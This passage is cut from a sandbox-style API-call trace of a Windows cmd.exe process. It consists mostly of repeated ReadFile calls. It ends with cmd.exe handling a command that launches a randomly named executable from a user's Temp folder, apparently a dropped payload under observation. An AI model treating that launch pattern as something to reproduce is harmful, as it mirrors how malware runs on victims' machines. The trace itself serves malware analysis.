lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, 
lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile 
(in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.448] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 
[0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, 
lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, 
lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: 
lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, 
lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, 
lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.473] _close (_FileHandle=4) returned 0 [0111.473] FindNextFileW (in: hFindFile=0x3d0f68, lpFindFileData=0x26eea8 | out: lpFindFileData=0x26eea8) returned 0 [0111.474] GetLastError () returned 0x12 [0111.474] FindClose (in: hFindFile=0x3d0f68 | out: hFindFile=0x3d0f68) returned 1 [0111.474] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0111.492] _close (_FileHandle=3) returned 0 [0111.493] GetConsoleTitleW (in: lpConsoleTitle=0x26f344, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.493] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe\"")) returned 0xffffffff [0111.493] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.493] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.493] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.493] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.493] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.493] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.493] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.493] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.493] _wcsicmp (_String1="\"C", 
_String2="MD") returned -75 [0111.493] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.493] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.493] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.493] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.493] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.493] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.493] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.493] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.493] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.494] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.494] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0111.494] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.494] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.494] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.494] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.494] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.494] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.494] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.494] 
_wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.494] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.494] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.494] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.494] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.494] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.494] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.494] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.494] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.494] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.494] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.495] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.495] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.495] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.495] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.495] _wcsicmp (_String1="\"C", _String2="DPATH") 
